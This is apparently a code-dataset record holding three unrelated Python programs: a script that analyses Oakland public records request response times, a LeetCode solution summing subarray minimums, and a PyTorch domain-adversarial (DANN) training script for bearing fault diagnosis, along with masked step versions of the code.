-> [prrID]\n\t\n\tfor dept in allDept:\n\t\tresponseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\t\topenReqMon = defaultdict(int) # month -> freq\n\t\t\n\t\tnmissRecd = 0\n\t\tnmissClose = 0\n\t\tnolder = 0\n\t\tfor prrID in deptTbl[dept]:\n\t\t\tprr = prrIDTbl[prrID]\n\t\t\t# 180228\n\t\t\t# recdDateTime = prr['recdDate']\n\t\t\trecdDateTime = prr['createDate']\n\n\t\t\tif recdDateTime==None:\n\t\t\t\tnmissRecd += 1\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif recdDateTime < startDate:\n\t\t\t\tnolder += 1\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\trecdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)\n\t\t\texcept Exception as e:\n\t\t\t\tprint('huh')\n\t\t\n\t\t\tif prr['status'] == 'Closed':\n\t\t\t\t# 180228\n\t\t\t\t# closeDate = prr['statusUpDate']\n\t\t\t\tcloseDate = prr['closeDate']\n\t\t\t\tif closeDate==None:\n\t\t\t\t\tnmissClose += 1\n\t\t\t\t\tmissCloseDetails[dept][recdMonKey].append(prrID)\n\t\t\t\t\tcontinue\n\n\t\t\t\trespDelay = closeDate - recdDateTime\n\t\t\t\tdelayDays = respDelay.days\n\t\t\t\tresponseMon[recdMonKey][delayDays] += 1\n\t\t\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDresp[recdMonKey][delayDays] += 1\n\t\t\t\n\t\t\telse:\n\t\t\t\topenReqMon[recdMonKey] += 1\n\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDopen[recdMonKey] += 1\n\t\t\n\t\tprint('\"%s\",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))\n\t\t\t\t\n\t\tallMonth = list(responseMon.keys())\n\t\tallMonth.sort()\n\t\t\n\t\tnormDept = normDeptName(dept)\n\t\t\n\t\toutf = outdir + normDept + '-RT.csv'\n\t\touts = open(outf,'w')\t\t\n\t\touts.write('Month,NClose,NOpen,Avg,Median\\n')\n\t\tfor recdMonKey in allMonth:\n\t\t\tnreq,avgDelay = compHistAvg(responseMon[recdMonKey])\n\t\t\tmedianDelay = compMedian(responseMon[recdMonKey])\n\t\t\touts.write('%s,%d,%d,%f,%d\\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))\n\t\touts.close()\n\t\t\n# \t\toutf = outdir + normDept + '-nopen.csv'\n# \t\touts = open(outf,'w')\t\t\n# \t\touts.write('Month,NOpen\\n')\n# \t\tfor recdMonKey in allMonth:\n# \t\t\touts.write('%s,%d\\n' % (recdMonKey,openReqMon[recdMonKey]))\n# \t\touts.close()\n\t\t\n\tallMonth = list(nonOPDresp.keys())\n\tallMonth.sort()\n\n\toutf = outdir + 'NonOPD-RT.csv'\n\touts = open(outf,'w')\t\t\n\t\n\touts.write('Month,N,NOPen,Avg,Median\\n')\n\tfor recdMonKey in allMonth:\n\t\tnreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n\t\tmedianDelay = compMedian(nonOPDresp[recdMonKey])\n\t\touts.write('%s,%d,%d,%f,%d\\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))\n\touts.close()\n\t\n# \toutf = outdir + 'NonOPD-NOpen.csv'\n# \touts = open(outf,'w')\t\t\n# \touts.write('Month,NOpen\\n')\n# \tfor recdMonKey in allMonth:\n# \t\touts.write('%s,%d\\n' % (recdMonKey,nonOPDopen[recdMonKey]))\n# \touts.close()\n\t\n\toutf = outdir + 'missClose.csv'\n\touts = open(outf,'w')\n\t# missCloseDetails: dept -> recd -> freq\n\t\n\tallDateSet = set()\n\tfor dept in missCloseDetails.keys():\n\t\tallDateSet.update(missCloseDetails[dept].keys())\n\tallDates = sorted(list(allDateSet))\n\t\n\thdr = 'Dept'\n\tfor date in allDates:\n\t\thdr += ',%s' % (date,)\n\touts.write(hdr+'\\n')\n\t\n\tfor dept in sorted(missCloseDetails.keys()):\n\t\tline = dept\n\t\tfor date in allDates:\n\t\t\tif date in missCloseDetails[dept]:\n\t\t\t\tline += ',%d' % (len(missCloseDetails[dept][date]),)\n\t\t\telse:\n\t\t\t\tline += ', '\n\t\touts.write(line+'\\n')\n\touts.close()\n\t\n\t\t\ndef rptDeptFreq(prrTbl, deptTbl,startDate,outf):\n\t\n\t# freq = defaultdict(int)\n\touts = open(outf,'w')\n\touts.write('Dept,Freq\\n')\n\t\n\tfor dept in sorted(deptTbl.keys()):\n\t\tnrecent = 0\n\t\tfor prrIdx in deptTbl[dept]:\n\t\t\tprr = prrTbl[prrIdx]\n\t\t\tif prr['createDate'] >= startDate:\n\t\t\t\tnrecent += 1\n\t\touts.write('%s,%d\\n' % (dept,nrecent))\n\t\n\touts.close()\n\ndef rptOpenPRR(prrTbl,outf):\n\t\n\tdaysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID]\n\trunDate = datetime.datetime.today()\n\t\n\tfor prrID in prrTbl.keys():\n\t\tprr = prrTbl[prrID]\n\t\topdP = 'Police Department' in prr['dept']\n\n\t\tif prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':\n\t\t\trecdDateTime = prr['createDate']\n\t\t\topenPeriod = runDate - recdDateTime\n\t\t\topenDays = openPeriod.days\n\t\t\t# NB: capture integer dividend\n\t\t\topenYears = openDays // 365\n\t\t\tif openYears == 0:\n\t\t\t\tdkey = openDays\n\t\t\telse:\n\t\t\t\tdkey = 1000 + openYears\n\t\t\tdaysOpen[opdP][dkey].append(prrID)\t\t\t\n\t\t\n\touts = open(outf,'w')\n\touts.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n\tallNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n\tallNDay = sorted(list(allNDaySet))\n\tfor nday in allNDay:\n\t\tif nday > 365:\n\t\t\tlbl = '> %d year' % (nday-1000)\n\t\telse:\n\t\t\tlbl = '%d' % nday\n\t\topdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n\t\tnonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n\t\t\t\n\t\touts.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl,len(opdList),len(nonList), opdList,nonList))\n\t\t\n\touts.close()\n\ndef getWebPages(prrTbl,outf):\n\t\n\touts = open(outf,'w')\n\touts.write('PRRID,OPD,Text\\n')\n\tnempty = 0\n\tnpdf = 0\n\tfor i,prrID in enumerate(sorted(prrTbl.keys())):\n\n\t\tprr = prrTbl[prrID]\n\t\tif prr['URL'] == '':\n\t\t\tnempty += 1\n\t\t\tcontinue\n\t\t\t\n\t\topdP = 'Police Department' in prr['dept']\n\t\t\n\t\turl = prr['URL']\n\t\tresponse = urllib.request.urlopen(url)\n\t\twebContentBytes = response.read()\n\t\twebContent = webContentBytes.decode(\"utf-8\")\n\t\tif webContent.find('pdf') != -1:\n\t\t\tprint('here')\n\t\t\tnpdf += 1\n\t\telse:\n\t\t\tcontinue\n\t\n\t\tif i % 100 == 0:\n\t\t\tprint(i,npdf,nempty)\n\t\t\t\n\t\t# outs.write('%s,%d,\"%s\"\\n' % (prrID,opdP,prr['text']))\n\touts.close()\n\tprint('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))\n\ndef loadPRRQuery(inf):\n\t\n\treader = csv.DictReader(open(inf))\n\tprrIDList = []\n\tfor i,entry in enumerate(reader):\n\t\t# Exhibit,PRRId\n\t\tprrIDList.append(entry['PRRId'].strip())\n\treturn prrIDList\n\t\t\ndef rptQry(qryList,outf):\n\touts = open(outf,'w')\n\touts.write('PRID,CreateDate,DaysOpen,Status\\n')\n\t\n\trunDate = datetime.datetime.today()\n\tfor prrID in qryList:\n\t\tprr = prr20Recent[prrID]\n\t\trecdDateTime = prr['createDate']\n\t\topenPeriod = runDate - recdDateTime\n\t\topenDays = openPeriod.days\n\t\touts.write('%s,%s,%d,%s\\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))\n\t\t\n\touts.close()\n\t\n\t\nif __name__ == '__main__':\n\n\tdataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n\t\n\n\tstartDate = datetime.datetime(2017,1,1)\n\t\n\tcsvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n\t# prr20, deptTbl = bldIndexTblCSV(csvFile)\n\tprr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)\n\t\n\topenPRRFile = dataDir + 'openPRR_200831.csv'\n\trptOpenPRR(prr20Recent,openPRRFile)\n\n\tdeptFreqFile = dataDir + 'deptFreq2.csv'\n\trptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)\n\t\n\tcreateDateFile = dataDir + 'createDate_200831.csv'\n\tanlyzCreateDates(prr20Recent,createDateFile)\n\t\n\tclearDateDir = dataDir + 'deptClear_200831/'\n\tanlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)\n\t\n\topenOPDFile = dataDir + 'openOPD_200831.csv'\n\trptOpenPRR(prr20Recent,openOPDFile)\n\n\t\n\n",
"step-ids": [
10,
11,
13,
14,
16
]
}
|
[
10,
11,
13,
14,
16
] |
class Solution:
def sumSubarrayMins(self, A: List[int]) ->int:
stack = []
prev = [None] * len(A)
for i in range(len(A)):
while stack and A[stack[-1]] >= A[i]:
stack.pop()
prev[i] = stack[-1] if stack else -1
stack.append(i)
stack = []
nex = [None] * len(A)
for i in range(len(A) - 1, -1, -1):
while stack and A[stack[-1]] > A[i]:
stack.pop()
nex[i] = stack[-1] if stack else len(A)
stack.append(i)
return sum((i - prev[i]) * (nex[i] - i) * A[i] for i in range(len(A))
) % (10 ** 9 + 7)
|
normal
|
{
"blob_id": "97029ac9f05037bf9304dacf86c35f5534d887c4",
"index": 8303,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def sumSubarrayMins(self, A: List[int]) ->int:\n stack = []\n prev = [None] * len(A)\n for i in range(len(A)):\n while stack and A[stack[-1]] >= A[i]:\n stack.pop()\n prev[i] = stack[-1] if stack else -1\n stack.append(i)\n stack = []\n nex = [None] * len(A)\n for i in range(len(A) - 1, -1, -1):\n while stack and A[stack[-1]] > A[i]:\n stack.pop()\n nex[i] = stack[-1] if stack else len(A)\n stack.append(i)\n return sum((i - prev[i]) * (nex[i] - i) * A[i] for i in range(len(A))\n ) % (10 ** 9 + 7)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
# @Time : 2022-03-09 21:51
# @Author : 袁肖瀚
# @FileName: WDCNN-DANN.py
# @Software: PyCharm
import torch
import numpy as np
import torch.nn as nn
import argparse
from model import WDCNN1
from torch.nn.init import xavier_uniform_
import torch.utils.data as Data
import matplotlib.pylab as plt
import wandb
import os
from matplotlib.ticker import FuncFormatter
#定义wandb参数
hyperparameter_defaults = dict(
epochs=70,
batch_train=40,
batch_val=50,
batch_test=40,
lr=0.0002,
weight_decay=0.0005,
r=0.02
)
wandb.init(config=hyperparameter_defaults, project="WDCNN-DANN")
config = wandb.config
plt.rcParams['font.family'] = ['Times New Roman']
def to_percent(temp, position):
return '%1.0f' % (temp) + '%'
# model initialization 参数初始化
def weight_init(m):
class_name = m.__class__.__name__ #得到网络层的名字
if class_name.find('Conv') != -1: # 使用了find函数,如果不存在返回值为-1,所以让其不等于-1
xavier_uniform_(m.weight.data)
if class_name.find('Linear') != -1:
xavier_uniform_(m.weight.data)
def batch_norm_init(m):
class_name = m.__class__.__name__
if class_name.find('BatchNorm') != -1:
m.reset_running_stats()
# split train and split data
def data_split_train(data_set, label_set):
data_set_train = []
data_set_val = []
label_set_train = []
label_set_val = []
for i in range(data_set.shape[0]): #行数 shape[2]通道数
index = np.arange(data_set.shape[1]) #列数矩阵[0 1 2 ''']
np.random.shuffle(index) #随机打乱数据 每次shuffle后数据都被打乱,这个方法可以在机器学习训练的时候在每个epoch结束后将数据重新洗牌进入下一个epoch的学习
a = index[:int((data_set.shape[1]) * 0.8)]
data = data_set[i] #第i行
data_train = data[a]
data_val = np.delete(data, a, 0)
data_set_train.append(data_train)
data_set_val.append(data_val)
label_set_train.extend(label_set[i][:len(data_train)])
label_set_val.extend(label_set[i][:len(data_val)])
data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])
data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])
label_set_train = np.array(label_set_train)
label_set_val = np.array(label_set_val)
return data_set_train, data_set_val, label_set_train, label_set_val
# training process
def train(train_dataset, val_dataset_s, val_dataset_t,train_dataset_t):
global alpha
#torch.cuda.empty_cache()
length = len(train_dataset.tensors[0])
optimizer = torch.optim.Adam(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)
train_dataloader = Data.DataLoader(train_dataset, batch_size=config.batch_train, shuffle=True)
val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.batch_val, shuffle=False)
val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.batch_val, shuffle=False)
t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.batch_train), shuffle=True) # 修改这里,保证两个训练集的迭代次数一致
# t_loader_iter = iter(t_loader)
val_loss_s = []
val_loss_t = []
val_acc_s = []
val_acc_t = []
cross_loss = [] #暂时不知道作用
Source_Train_Acc=[]
for epoch in range(config.epochs):
# t_loader = Data.DataLoader(train_dataset_t, batch_size=int(args.batch_train),shuffle=True) # 修改这里,保证两个训练集的迭代次数一致
t_loader_iter = iter(t_loader)
model.train()
for index, (s_data_train, s_label_train) in enumerate(train_dataloader):
p = float(index) / 20
alpha = 2. / (1. + np.exp(-10 * p)) - 1
t_data_train = t_loader_iter.next()
s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)
t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)
s_label_train = s_label_train.long().to(device)
s_domain_label = torch.zeros(config.batch_train).long().cuda()
t_domain_label = torch.ones(config.batch_train).long().cuda()
s_out_train, s_domain_out = model(s_data_train, alpha)
t_out_train, t_domain_out = model(t_data_train, alpha)
loss_domain_s = criterion(s_domain_out, s_domain_label) #源域域分类损失
loss_domain_t = criterion(t_domain_out, t_domain_label) #目标域域分类损失
loss_c = criterion(s_out_train, s_label_train) #分类器损失
loss = loss_c + (loss_domain_s + loss_domain_t)*0.02
optimizer.zero_grad()
loss.backward()
optimizer.step()
pred_s = torch.argmax(s_out_train.data, 1) # 返回指定维度最大值的序号 dim=1
correct_s = pred_s.eq(s_label_train).cpu().sum() #源域正确率
acc = 100. * correct_s.item() / len(s_data_train)
Source_Train_Acc.append(acc)
wandb.log({"Source Train Acc": acc})
if index % 2 == 0:
print('Train Epoch: {}/{} [{}/{} ({:.0f}%)] \t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'.format
(epoch, config.epochs, (index + 1) * len(s_data_train), length,
100. * (config.batch_train * (index + 1) / length), loss_c.item(),
loss_domain_s.item() + loss_domain_t.item()
, acc))
#validation
model.eval()
#源域验证
correct_val_s = 0
sum_loss_s = 0
length_val_s = len(val_dataset_s)
for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):
with torch.no_grad():
s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)
s_label_val = s_label_val.long().to(device)
output_val_s, _ = model(s_data_val, alpha)
loss_s = criterion(output_val_s, s_label_val)
pred_val_s = torch.argmax(output_val_s.data, 1)
correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()
sum_loss_s += loss_s
acc_s = 100. * correct_val_s.item() / length_val_s #源域正确率
average_loss_s = sum_loss_s.item() / length_val_s #源域损失
#目标域验证
correct_val_t = 0
sum_loss_t = 0
length_val_t = len(val_dataset_t)
for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):
with torch.no_grad():
t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)
t_label_val = t_label_val.long().to(device)
output_val_t, _ = model(t_data_val, alpha)
loss_t = criterion(output_val_t, t_label_val)
pred_val_t = torch.argmax(output_val_t.data, 1)
correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()
sum_loss_t += loss_t
acc_t = 100. * correct_val_t.item() / length_val_t #目标域正确率
average_loss_t = sum_loss_t.item() / length_val_t #目标域损失
metrics = {"Acc_val_t": acc_t, 'epoch':epoch}
wandb.log(metrics)
print('\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%'.format(
epoch, config.epochs, average_loss_s, acc_s,average_loss_t, acc_t))
val_loss_s.append(loss_s.item())
val_loss_t.append(loss_t.item())
val_acc_t.append(acc_t)
val_acc_s.append(acc_s)
torch.save(model.state_dict(), os.path.join(wandb.run.dir, "model.pth"))
#画出验证集正确率曲线
plt.plot(val_acc_s, 'r-',marker='s')
plt.plot(val_acc_t, 'g-',marker='*')
plt.legend(["Source domain validation accuracy", "Target domain validation accuracy"])
plt.xlabel('Epochs')
plt.ylabel('validation accuracy')
plt.title('Source doamin & Target domain Validation Accuracy Rate')
plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))
plt.savefig("Source doamin & Target domain Validation Accuracy Rate.png")
plt.show()
#画出验证集损失
plt.plot(val_loss_s, 'r-',marker='o')
plt.plot(val_loss_t, 'g-',marker='x')
plt.legend(["Source domain validation Loss", "Target domain validation Loss"])
plt.xlabel('Epochs')
plt.ylabel('val_loss')
plt.title('Source domain & Target domain Validation Loss')
plt.savefig("Source domain & Target domain Validation Loss")
plt.show()
# testing
def test(test_dataset):
model.eval()
length = len(test_dataset)
correct = 0
test_loader = Data.DataLoader(test_dataset, batch_size=config.batch_test, shuffle=False)
y_test = []
y_pred = []
for index, (data, label) in enumerate(test_loader):
with torch.no_grad():
data = data.float().to(device)
label = label.long().to(device)
y_test.append(label)
output, _ = model(data.unsqueeze(dim=1), alpha)
pred = torch.argmax(output.data, 1)
y_pred.append(pred)
correct += pred.eq(label).cpu().sum()
acc = 100. * correct / length
return acc
if __name__ == '__main__':
torch.cuda.empty_cache()
# use cpu or gpu
if torch.cuda.is_available():
device = 'cuda'
else:
device = 'cpu'
device = torch.device(device)
# CWRU
dataset_s_train = np.load(r'bearing numpy data\dataset_train_0HP_100.npz')
dataset_s_test = np.load(r'bearing numpy data\dataset_val_0HP_80.npz')
dataset_t_train = np.load(r'bearing numpy data\dataset_train_3HP_100.npz')
dataset_t_test = np.load(r'bearing numpy data\dataset_val_3HP_80.npz')
data_s_train_val = dataset_s_train['data']
data_s_test = dataset_s_test['data'].reshape(-1, 1024)
data_t_train_val = dataset_t_train['data']
data_t_test = dataset_t_test['data'].reshape(-1, 1024)
label_s_train_val = dataset_s_train['label']
label_s_test = dataset_s_test['label'].reshape(1, -1)
label_t_train_val = dataset_t_train['label']
label_t_test = dataset_t_test['label'].reshape(1, -1)
iteration_acc = []
test_acc_s = []
# repeat several times for an average result
for iteration in range(1):
# load model
model = WDCNN1(C_in=1, class_num=10).to(device)
model.apply(weight_init)
model.apply(batch_norm_init)
# train/val
data_s_train, data_s_val, label_s_train, label_s_val = data_split_train(data_s_train_val, label_s_train_val)
data_t_train, data_t_val, _, label_t_val = data_split_train(data_t_train_val, label_t_train_val)
# transfer ndarray to tensor
data_s_train = torch.from_numpy(data_s_train)
data_s_val = torch.from_numpy(data_s_val)
data_t_val = torch.from_numpy(data_t_val) #加的验证
data_s_test = torch.from_numpy(data_s_test)
data_t_train = torch.from_numpy(data_t_train)
data_t_test = torch.from_numpy(data_t_test)
label_s_train = torch.from_numpy(label_s_train)
label_s_val = torch.from_numpy(label_s_val)
label_t_val = torch.from_numpy(label_t_val) #加的验证
label_s_test = torch.from_numpy(label_s_test)
#label_t_train = torch.from_numpy(label_t_train)
label_t_test = torch.from_numpy(label_t_test)
# seal to data-set
train_dataset_s = Data.TensorDataset(data_s_train, label_s_train)
train_dataset_t = Data.TensorDataset(data_t_train)
val_dataset_s = Data.TensorDataset(data_s_val, label_s_val)
val_dataset_t = Data.TensorDataset(data_t_val, label_t_val) #加的验证
test_dataset_s = Data.TensorDataset(data_s_test, label_s_test.squeeze())
test_dataset_t = Data.TensorDataset(data_t_test, label_t_test.squeeze())
# print(train_dataset_s, val_dataset_s)
criterion = nn.NLLLoss()
train(train_dataset_s, val_dataset_s, val_dataset_t,train_dataset_t)
s_test_acc = test(test_dataset_s)
t_test_acc = test(test_dataset_t)
print('\n source_acc: {:.2f}% target_acc: {:.2f}%'.format(s_test_acc, t_test_acc))
wandb.finish()
|
normal
|
{
"blob_id": "fd45657083942dee13f9939ce2a4b71ba3f67397",
"index": 3587,
"step-1": "<mask token>\n\n\ndef weight_init(m):\n class_name = m.__class__.__name__\n if class_name.find('Conv') != -1:\n xavier_uniform_(m.weight.data)\n if class_name.find('Linear') != -1:\n xavier_uniform_(m.weight.data)\n\n\n<mask token>\n\n\ndef data_split_train(data_set, label_set):\n data_set_train = []\n data_set_val = []\n label_set_train = []\n label_set_val = []\n for i in range(data_set.shape[0]):\n index = np.arange(data_set.shape[1])\n np.random.shuffle(index)\n a = index[:int(data_set.shape[1] * 0.8)]\n data = data_set[i]\n data_train = data[a]\n data_val = np.delete(data, a, 0)\n data_set_train.append(data_train)\n data_set_val.append(data_val)\n label_set_train.extend(label_set[i][:len(data_train)])\n label_set_val.extend(label_set[i][:len(data_val)])\n data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])\n data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])\n label_set_train = np.array(label_set_train)\n label_set_val = np.array(label_set_val)\n return data_set_train, data_set_val, label_set_train, label_set_val\n\n\n<mask token>\n\n\ndef test(test_dataset):\n model.eval()\n length = len(test_dataset)\n correct = 0\n test_loader = Data.DataLoader(test_dataset, batch_size=config.\n batch_test, shuffle=False)\n y_test = []\n y_pred = []\n for index, (data, label) in enumerate(test_loader):\n with torch.no_grad():\n data = data.float().to(device)\n label = label.long().to(device)\n y_test.append(label)\n output, _ = model(data.unsqueeze(dim=1), alpha)\n pred = torch.argmax(output.data, 1)\n y_pred.append(pred)\n correct += pred.eq(label).cpu().sum()\n acc = 100.0 * correct / length\n return acc\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef weight_init(m):\n class_name = m.__class__.__name__\n if class_name.find('Conv') != -1:\n xavier_uniform_(m.weight.data)\n if class_name.find('Linear') != -1:\n xavier_uniform_(m.weight.data)\n\n\ndef batch_norm_init(m):\n class_name = m.__class__.__name__\n if class_name.find('BatchNorm') != -1:\n m.reset_running_stats()\n\n\ndef data_split_train(data_set, label_set):\n data_set_train = []\n data_set_val = []\n label_set_train = []\n label_set_val = []\n for i in range(data_set.shape[0]):\n index = np.arange(data_set.shape[1])\n np.random.shuffle(index)\n a = index[:int(data_set.shape[1] * 0.8)]\n data = data_set[i]\n data_train = data[a]\n data_val = np.delete(data, a, 0)\n data_set_train.append(data_train)\n data_set_val.append(data_val)\n label_set_train.extend(label_set[i][:len(data_train)])\n label_set_val.extend(label_set[i][:len(data_val)])\n data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])\n data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])\n label_set_train = np.array(label_set_train)\n label_set_val = np.array(label_set_val)\n return data_set_train, data_set_val, label_set_train, label_set_val\n\n\ndef train(train_dataset, val_dataset_s, val_dataset_t, train_dataset_t):\n global alpha\n length = len(train_dataset.tensors[0])\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr,\n weight_decay=config.weight_decay)\n train_dataloader = Data.DataLoader(train_dataset, batch_size=config.\n batch_train, shuffle=True)\n val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.\n batch_val, shuffle=False)\n val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.\n batch_val, shuffle=False)\n t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.\n batch_train), shuffle=True)\n val_loss_s = []\n val_loss_t = []\n val_acc_s = []\n val_acc_t = []\n cross_loss = []\n Source_Train_Acc = []\n for epoch in range(config.epochs):\n t_loader_iter = iter(t_loader)\n model.train()\n for index, (s_data_train, s_label_train) in enumerate(train_dataloader\n ):\n p = float(index) / 20\n alpha = 2.0 / (1.0 + np.exp(-10 * p)) - 1\n t_data_train = t_loader_iter.next()\n s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)\n t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)\n s_label_train = s_label_train.long().to(device)\n s_domain_label = torch.zeros(config.batch_train).long().cuda()\n t_domain_label = torch.ones(config.batch_train).long().cuda()\n s_out_train, s_domain_out = model(s_data_train, alpha)\n t_out_train, t_domain_out = model(t_data_train, alpha)\n loss_domain_s = criterion(s_domain_out, s_domain_label)\n loss_domain_t = criterion(t_domain_out, t_domain_label)\n loss_c = criterion(s_out_train, s_label_train)\n loss = loss_c + (loss_domain_s + loss_domain_t) * 0.02\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n pred_s = torch.argmax(s_out_train.data, 1)\n correct_s = pred_s.eq(s_label_train).cpu().sum()\n acc = 100.0 * correct_s.item() / len(s_data_train)\n Source_Train_Acc.append(acc)\n wandb.log({'Source Train Acc': acc})\n if index % 2 == 0:\n print(\n 'Train Epoch: {}/{} [{}/{} ({:.0f}%)] \\t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'\n .format(epoch, config.epochs, (index + 1) * len(\n s_data_train), length, 100.0 * (config.batch_train * (\n index + 1) / length), loss_c.item(), loss_domain_s.item\n () + loss_domain_t.item(), acc))\n model.eval()\n correct_val_s = 0\n sum_loss_s = 0\n length_val_s = len(val_dataset_s)\n for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):\n with torch.no_grad():\n s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)\n s_label_val = s_label_val.long().to(device)\n output_val_s, _ = model(s_data_val, alpha)\n loss_s = criterion(output_val_s, s_label_val)\n pred_val_s = torch.argmax(output_val_s.data, 1)\n correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()\n sum_loss_s += loss_s\n acc_s = 100.0 * correct_val_s.item() / length_val_s\n average_loss_s = sum_loss_s.item() / length_val_s\n correct_val_t = 0\n sum_loss_t = 0\n length_val_t = len(val_dataset_t)\n for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):\n with torch.no_grad():\n t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)\n t_label_val = t_label_val.long().to(device)\n output_val_t, _ = model(t_data_val, alpha)\n loss_t = criterion(output_val_t, t_label_val)\n pred_val_t = torch.argmax(output_val_t.data, 1)\n correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()\n sum_loss_t += loss_t\n acc_t = 100.0 * correct_val_t.item() / length_val_t\n average_loss_t = sum_loss_t.item() / length_val_t\n metrics = {'Acc_val_t': acc_t, 'epoch': epoch}\n wandb.log(metrics)\n print(\n \"\"\"\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%\"\"\"\n .format(epoch, config.epochs, average_loss_s, acc_s,\n average_loss_t, acc_t))\n val_loss_s.append(loss_s.item())\n val_loss_t.append(loss_t.item())\n val_acc_t.append(acc_t)\n val_acc_s.append(acc_s)\n torch.save(model.state_dict(), os.path.join(wandb.run.dir, 'model.pth'))\n plt.plot(val_acc_s, 'r-', marker='s')\n plt.plot(val_acc_t, 'g-', marker='*')\n plt.legend(['Source domain validation accuracy',\n 'Target domain validation accuracy'])\n plt.xlabel('Epochs')\n plt.ylabel('validation accuracy')\n plt.title('Source doamin & Target domain Validation Accuracy Rate')\n plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))\n plt.savefig('Source doamin & Target domain Validation Accuracy Rate.png')\n plt.show()\n plt.plot(val_loss_s, 'r-', marker='o')\n plt.plot(val_loss_t, 'g-', marker='x')\n plt.legend(['Source domain validation Loss',\n 'Target domain validation Loss'])\n plt.xlabel('Epochs')\n plt.ylabel('val_loss')\n plt.title('Source domain & Target domain Validation Loss')\n plt.savefig('Source domain & Target domain Validation Loss')\n plt.show()\n\n\ndef test(test_dataset):\n model.eval()\n length = len(test_dataset)\n correct = 0\n test_loader = Data.DataLoader(test_dataset, batch_size=config.\n batch_test, shuffle=False)\n y_test = []\n y_pred = []\n for index, (data, label) in enumerate(test_loader):\n with torch.no_grad():\n data = data.float().to(device)\n label = label.long().to(device)\n y_test.append(label)\n output, _ = model(data.unsqueeze(dim=1), alpha)\n pred = torch.argmax(output.data, 1)\n y_pred.append(pred)\n correct += pred.eq(label).cpu().sum()\n acc = 100.0 * correct / length\n return acc\n\n\n<mask token>\n",
